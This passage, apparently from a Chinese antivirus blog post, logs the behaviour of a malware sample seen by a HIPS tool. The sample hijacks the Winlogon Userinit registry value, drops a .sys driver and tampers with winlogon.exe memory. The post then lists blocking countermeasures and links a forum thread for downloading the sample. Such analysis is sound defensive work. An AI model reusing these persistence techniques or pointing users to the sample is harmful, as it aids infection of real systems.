更改后:C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\wsnpoema.exe,
更改前:C:\WINDOWS\system32\userinit.exe,
触发规则:所有程序规则->自动启动->HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

向drivers目录写入sys

2009-11-26 14:27:19 创建文件
进程路径:E:\KIA\1\1.exe
文件路径:C:\WINDOWS\system32\drivers\wsnpoem.sys
触发规则:所有程序规则->系统核心目录Ⅰ->%systemroot%\system32\drivers\*

读取、修改winlogon进程内存

2009-11-26 14:27:19 读取其它进程内存
进程路径:E:\KIA\1\1.exe
目标进程:C:\WINDOWS\system32\winlogon.exe
触发规则:所有程序规则->进程保护->%systemroot%\system32\winlogon.exe

2009-11-26 14:27:39 修改其它进程内存
进程路径:E:\KIA\1\1.exe
目标进程:C:\WINDOWS\system32\winlogon.exe
触发规则:所有程序规则->进程保护->%systemroot%\system32\winlogon.exe

联网行为：

关键行为：

向系统目录创建exe sys

读取修改winlogon进程内存

防范对策：

使用HIPS阻止陌生程序向系统目录创建exe sys

使用HIPS阻止陌生程序读取修改winlogon进程内存

使用HIPS阻止陌生程序修改winlogon启动项

样本下载：http://bbs.janmeng.com/thread-905575-1-1.html

阅读全文
类别：反病毒查看评论]]> 2009年11月26日星期四 14:57 http://hi.baidu.com/eqsyssecurity/blog/item/0ebd9a34b5edff44241f14f1.html